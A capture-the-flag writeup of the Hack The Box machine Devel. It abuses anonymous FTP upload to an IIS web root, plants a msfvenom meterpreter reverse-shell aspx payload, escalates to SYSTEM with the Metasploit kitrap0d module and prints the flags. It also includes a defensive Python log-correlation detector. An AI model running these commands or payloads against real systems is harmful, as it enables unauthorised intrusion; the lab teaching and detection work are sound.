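HTB Devel [Hack The Box HTB lab] writeup series 3
Devel, the third of the Retired Machines
Contents
0x00 Target overview
0x01 Port scan
0x02 FTP service
0x03 Uploading the payload
0x04 get webshell
0x05 Privilege escalation
0x00 Target overview
Judging by the machine's profile, the difficulty is beginner level: most of the ratings are 1, 2 or 3 points. The operating system is Windows.
0x01 Port scan
Let's see which services the target exposes: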
root@kali:~# nmap -T5 -A -v 10.10.10.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 01:51 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Initiating NSE at 01:51
Completed NSE at 01:51, 0.00s elapsed
Initiating Ping Scan at 01:51
Scanning 10.10.10.5 [4 ports]
Completed Ping Scan at 01:51, 0.41s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:51
Completed Parallel DNS resolution of 1 host. at 01:51, 0.10s elapsed
Initiating SYN Stealth Scan at 01:51
Scanning 10.10.10.5 [1000 ports]
Discovered open port 80/tcp on 10.10.10.5
Discovered open port 21/tcp on 10.10.10.5
Increasing send delay for 10.10.10.5 from 0 to 5 due to 11 out of 22 dropped probes since last increase.
SYN Stealth Scan Timing: About 19.77% done; ETC: 01:53 (0:02:06 remaining)
SYN Stealth Scan Timing: About 25.13% done; ETC: 01:55 (0:03:02 remaining)
SYN Stealth Scan Timing: About 30.50% done; ETC: 01:56 (0:03:27 remaining)
SYN Stealth Scan Timing: About 39.93% done; ETC: 01:57 (0:03:43 remaining)
Stats: 0:04:35 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 54.30% done; ETC: 01:59 (0:03:51 remaining)
SYN Stealth Scan Timing: About 60.33% done; ETC: 01:59 (0:03:22 remaining)
SYN Stealth Scan Timing: About 66.27% done; ETC: 01:59 (0:02:52 remaining)
SYN Stealth Scan Timing: About 72.27% done; ETC: 01:59 (0:02:21 remaining)
SYN Stealth Scan Timing: About 77.63% done; ETC: 01:59 (0:01:55 remaining)
SYN Stealth Scan Timing: About 83.00% done; ETC: 01:59 (0:01:28 remaining)
SYN Stealth Scan Timing: About 88.67% done; ETC: 01:59 (0:00:59 remaining)
Completed SYN Stealth Scan at 02:00, 518.03s elapsed (1000 total ports)
Initiating Service scan at 02:00
Scanning 2 services on 10.10.10.5
Completed Service scan at 02:00, 6.94s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.5
Retrying OS detection (try #2) against 10.10.10.5
Initiating Traceroute at 02:00
Completed Traceroute at 02:00, 1.52s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 02:00
Completed Parallel DNS resolution of 2 hosts. at 02:00, 0.86s elapsed
NSE: Script scanning 10.10.10.5.
Initiating NSE at 02:00
NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
Completed NSE at 02:00, 12.19s elapsed
Initiating NSE at 02:00
Completed NSE at 02:00, 1.91s elapsed
Initiating NSE at 02:00
Completed NSE at 02:00, 0.00s elapsed
Nmap scan report for 10.10.10.5
Host is up (0.38s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.028 days (since Sat Feb 1 01:19:50 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 493.99 ms 10.10.14.1
2 494.71 ms 10.10.10.5

NSE: Script Post-scanning.
Initiating NSE at 02:00
Completed NSE at 02:00, 0.00s elapsed
Initiating NSE at 02:00
Completed NSE at 02:00, 0.00s elapsed
Initiating NSE at 02:00
Completed NSE at 02:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 559.20 seconds
Raw packets sent: 3366 (153.268KB) | Rcvd: 281 (14.268KB)
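We can see that ports 21 and 80 are open, and that the FTP service allows anonymous login.
0x02 FTP service
Let's test what the FTP service actually allows: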
root@kali:~# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> upload a.out
?Invalid command
ftp> help
Commands may be abbreviated. Commands are:

! dir mdelete qc site
$ disconnect mdir sendport size
account exit mget put status
append form mkdir pwd struct
ascii get mls quit system
bell glob mode quote sunique
binary hash modtime recv tenex
bye help mput reget tick
case idle newer rstatus trace
cd image nmap rhelp type
cdup ipany nlist rename user
chmod ipv4 ntrans reset umask
close ipv6 open restart verbose
cr lcd prompt rmdir ?
delete ls passive runique
debug macdef proxy send
ftp> put a.out
local: a.out remote: a.out
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
87954 bytes sent in 1.56 secs (54.9896 kB/s)
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
02-04-20 05:23PM 87954 a.out
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> rm a.out
550 The directory name is invalid.
ftp> del a.out
250 DELE command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp>
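From the tests above we can conclude the following:
- The FTP root appears to be the default IIS web root
- The FTP service allows anonymous login
- The FTP service allows anonymous users to upload and delete files
0x03 Uploading the payload
We use msf to generate an aspx payload file: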
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f aspx > a.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2823 bytes
root@kali:~#
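Note: I took a small detour here. I first generated an asp payload, but later found that the asp payload could not be executed on this IIS server.
Then we upload the aspx payload through the FTP service: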
root@kali:~# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): ftp
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-04-20 05:32PM 38579 a.asp
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> del a.asp
250 DELE command successful.
ftp> put a.aspx
local: a.aspx remote: a.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2859 bytes sent in 0.00 secs (34.0819 MB/s)
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-04-20 05:41PM 2859 a.aspx
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp>
0x04 get webshell
Configure the listener in msf:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Run exploit -j -z
The listener is now running in the background:
msf5 > jobs

Jobs
====

  Id  Name                    Payload                          Payload opts
  --  ----                    -------                          ------------
  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  tcp://10.10.14.20:4444

Then we can open the following URL in a browser:
http://10.10.10.5/a.aspx
The reverse connection then arrives and we have our webshell session:
msf5 > sessions

Active sessions
===============

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  5         meterpreter x86/windows  IIS APPPOOL\Web @ DEVEL  10.10.14.20:4444 -> 10.10.10.5:49159 (10.10.10.5)

We can see that we hold the privileges of the IIS user; the next step is privilege escalation.
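On the server side, the chain in 0x02 to 0x04 shows up as an FTP STOR of a script file followed by an HTTP request for the same path. The Python below is an added example, not part of the original writeup: it correlates an IIS FTP log with an IIS HTTP log to surface exactly that sequence. The log lines are constructed samples, the W3C field layout is an assumption about the logging configuration, and the FTP root is assumed to be the web root, as found in 0x02.

```python
from datetime import datetime

# Extensions IIS passes to a script engine instead of serving as static content.
SCRIPT_EXTS = (".aspx", ".asp", ".ashx", ".asmx")

# Constructed sample logs (not from the original post); the field layout is assumed.
FTP_LOG = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2020-02-04 15:23:10 10.10.14.20 anonymous 10.10.10.5 21 STOR a.out 226 0 0 s1 /a.out
2020-02-04 15:32:05 10.10.14.20 anonymous 10.10.10.5 21 STOR a.asp 226 0 0 s1 /a.asp
2020-02-04 15:40:50 10.10.14.20 anonymous 10.10.10.5 21 DELE a.asp 250 0 0 s2 /a.asp
2020-02-04 15:41:02 10.10.14.20 anonymous 10.10.10.5 21 STOR a.aspx 226 0 0 s2 /a.aspx
"""
HTTP_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2020-02-04 15:20:00 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.20 Mozilla/5.0 200 0 0 15
2020-02-04 15:42:30 10.10.10.5 GET /a.aspx - 80 - 10.10.14.20 Mozilla/5.0 200 0 0 312
"""


def parse_w3c(text):
    """Yield one dict per record of a W3C extended log, keyed by its #Fields header."""
    fields = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) != len(fields):
                continue  # skip truncated or malformed records
            rec = dict(zip(fields, values))
            rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
            yield rec


def script_uploads_with_hits(ftp_log, http_log):
    """Return FTP uploads of script files, each with the HTTP requests that followed.

    Assumes the FTP root and the web root are the same directory, so the FTP
    x-fullpath equals the URL path. Paths compare case-insensitively, as on IIS.
    """
    uploads = []
    for rec in parse_w3c(ftp_log):
        path = rec["x-fullpath"].lower()
        if rec["cs-method"] == "STOR" and rec["sc-status"] == "226" and path.endswith(SCRIPT_EXTS):
            uploads.append({"path": path, "user": rec["cs-username"],
                            "uploader": rec["c-ip"], "uploaded_at": rec["ts"], "hits": []})
    for rec in parse_w3c(http_log):
        for up in uploads:
            if rec["cs-uri-stem"].lower() == up["path"] and rec["ts"] >= up["uploaded_at"]:
                up["hits"].append((rec["ts"], rec["c-ip"], rec["sc-status"]))
    return uploads


if __name__ == "__main__":
    for up in script_uploads_with_hits(FTP_LOG, HTTP_LOG):
        state = "REQUESTED over HTTP" if up["hits"] else "uploaded, not requested"
        print(f"{up['uploaded_at']} {up['user']}@{up['uploader']} STOR {up['path']}: {state}")
        for ts, ip, status in up["hits"]:
            print(f"    {ts} {ip} -> HTTP {status}")
```

Any script upload by an anonymous FTP user is worth an alert on its own; a later HTTP 200 for the same path means the uploaded file was served through the script engine.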
0x05 Privilege escalation
Windows privilege escalation starts with checking the system information and patch level:
meterpreter > shell
Process 2620 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>systeminfo
systeminfo

Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31
System Boot Time: 4/2/2020, 4:23:16
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
    [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 710 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.516 MB
Virtual Memory: In Use: 531 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
    [01]: Intel(R) PRO/1000 MT Network Connection
          Connection Name: Local Area Connection
          DHCP Enabled: No
          IP address(es)
          [01]: 10.10.10.5

c:\windows\system32\inetsrv>wmic qfe
wmic qfe
No Instance(s) Available.

c:\windows\system32\inetsrv>
From the information above, the operating system is Windows 7 Enterprise and no specific hotfixes are listed, so we will test the candidates one by one.
First, let's see which Windows privilege-escalation modules are available in msf:
msf5 > search windows/local/ms

Matching Modules
================

   #   Name                                                           Disclosure Date  Rank       Check  Description
   -   ----                                                           ---------------  ----       -----  -----------
   0   exploit/windows/local/ms10_015_kitrap0d                        2010-01-19       great      Yes    Windows SYSTEM Escalation via KiTrap0D
   1   exploit/windows/local/ms10_092_schelevator                     2010-09-13       excellent  Yes    Windows Escalate Task Scheduler XML Privilege Escalation
   2   exploit/windows/local/ms11_080_afdjoinleaf                     2011-11-30       average    No     MS11-080 AfdJoinLeaf Privilege Escalation
   3   exploit/windows/local/ms13_005_hwnd_broadcast                  2012-11-27       excellent  No     MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation
   4   exploit/windows/local/ms13_053_schlamperei                     2013-12-01       average    Yes    Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)
   5   exploit/windows/local/ms13_081_track_popup_menu                2013-10-08       average    Yes    Windows TrackPopupMenuEx Win32k NULL Page
   6   exploit/windows/local/ms13_097_ie_registry_symlink             2013-12-10       great      No     MS13-097 Registry Symlink IE Sandbox Escape
   7   exploit/windows/local/ms14_009_ie_dfsvc                        2014-02-11       great      Yes    MS14-009 .NET Deployment Service IE Sandbox Escape
   8   exploit/windows/local/ms14_058_track_popup_menu                2014-10-14       normal     Yes    Windows TrackPopupMenu Win32k NULL Pointer Dereference
   9   exploit/windows/local/ms14_070_tcpip_ioctl                     2014-11-11       average    Yes    MS14-070 Windows tcpip!SetAddrOptions NULL Pointer Dereference
   10  exploit/windows/local/ms15_004_tswbproxy                       2015-01-13       good       Yes    MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape
   11  exploit/windows/local/ms15_051_client_copy_image               2015-05-12       normal     Yes    Windows ClientCopyImage Win32k Exploit
   12  exploit/windows/local/ms15_078_atmfd_bof                       2015-07-11       manual     Yes    MS15-078 Microsoft Windows Font Driver Buffer Overflow
   13  exploit/windows/local/ms16_014_wmi_recv_notif                  2015-12-04       normal     Yes    Windows WMI Receive Notification Exploit
   14  exploit/windows/local/ms16_016_webdav                          2016-02-09       excellent  Yes    MS16-016 mrxdav.sys WebDav Local Privilege Escalation
   15  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  2016-03-21       normal     Yes    MS16-032 Secondary Logon Handle Privilege Escalation
   16  exploit/windows/local/ms16_075_reflection                      2016-01-16       normal     Yes    Windows Net-NTLMv2 Reflection DCOM/RPC
   17  exploit/windows/local/ms16_075_reflection_juicy                2016-01-16       great      Yes    Windows Net-NTLMv2 Reflection DCOM/RPC (Juicy)
   18  exploit/windows/local/ms18_8120_win32k_privesc                 2018-05-09       good       No     Windows SetImeInfoEx Win32k NULL Pointer Dereference
   19  exploit/windows/local/ms_ndproxy                               2013-11-27       average    Yes    MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation

Start with ms10_092, which is ranked excellent:
msf5 > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > show options

Module options (exploit/windows/local/ms10_092_schelevator):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        no        Command to execute instead of a payload
   SESSION                    yes       The session to run this module on.
   TASKNAME                   no        A name for the created task (default random)


Exploit target:

   Id  Name
   --  ----
   0   Windows Vista, 7, and 2008


msf5 exploit(windows/local/ms10_092_schelevator) > set session 5
session => 5
msf5 exploit(windows/local/ms10_092_schelevator) > set LHOST 10.10.14.20
LHOST => 10.10.14.20
msf5 exploit(windows/local/ms10_092_schelevator) > set lport 1234
lport => 1234
msf5 exploit(windows/local/ms10_092_schelevator) > show options

Module options (exploit/windows/local/ms10_092_schelevator):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        no        Command to execute instead of a payload
   SESSION   5                yes       The session to run this module on.
   TASKNAME                   no        A name for the created task (default random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Vista, 7, and 2008


msf5 exploit(windows/local/ms10_092_schelevator) > exploit

[*] Started reverse TCP handler on 10.10.14.20:1234
[*] Preparing payload at C:\Windows\TEMP\xyAJFfWWqWKC.exe
[*] Creating task: iRd11XMmcfeJJ
[*] ERROR: The task XML contains a value which is incorrectly formatted or out of range.
[*] (58,4):Task:
[*] Reading the task file contents from C:\Windows\system32\tasks\iRd11XMmcfeJJ...
[-] Exploit failed: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified.
[*] Exploit completed, but no session was created.
That did not work, so I went on to test ms10_015, which is ranked great:
msf5 > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 5
session => 5
msf5 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  5                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.14.20
lhost => 10.10.14.20
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 1234
lport => 1234
msf5 exploit(windows/local/ms10_015_kitrap0d) > show options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  5                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT     1234             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)


msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit

[*] Started reverse TCP handler on 10.10.14.20:1234
[*] Launching notepad to host the exploit...
[+] Process 3452 launched.
[*] Reflectively injecting the exploit DLL into 3452...
[*] Injecting exploit into 3452 ...
[*] Exploit injected. Injecting payload into 3452...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 6 opened (10.10.14.20:1234 -> 10.10.10.5:49167) at 2020-02-01 03:21:23 -0500

meterpreter > background
[*] Backgrounding session 6...
msf5 exploit(windows/local/ms10_015_kitrap0d) > sessions

Active sessions
===============

  Id  Name  Type                     Information                  Connection
  --  ----  ----                     -----------                  ----------
  5         meterpreter x86/windows  IIS APPPOOL\Web @ DEVEL      10.10.14.20:4444 -> 10.10.10.5:49159 (10.10.10.5)
  6         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ DEVEL  10.10.14.20:1234 -> 10.10.10.5:49167 (10.10.10.5)

As we can see, the privilege escalation succeeded and a new connection was established with SYSTEM privileges. With that, nothing stands in the way, and we can go straight for the flags:
c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\Administrator\Desktop

18/03/2017 01:17 <DIR> .
18/03/2017 01:17 <DIR> ..
18/03/2017 01:17 32 root.txt.txt
 1 File(s) 32 bytes
 2 Dir(s) 24.594.886.656 bytes free

c:\Users\Administrator\Desktop>cat root.txt.txt
cat root.txt.txt
'cat' is not recognized as an internal or external command,
operable program or batch file.

c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a0b5041708797c4fc4728bc72b4b
c:\Users\Administrator\Desktop>cd c:\Users\babis\Desktop\
cd c:\Users\babis\Desktop\

c:\Users\babis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis\Desktop

18/03/2017 01:14 <DIR> .
18/03/2017 01:14 <DIR> ..
18/03/2017 01:18 32 user.txt.txt
 1 File(s) 32 bytes
 2 Dir(s) 24.594.886.656 bytes free

c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd6a3aedf24b41562fea70f4cb3e8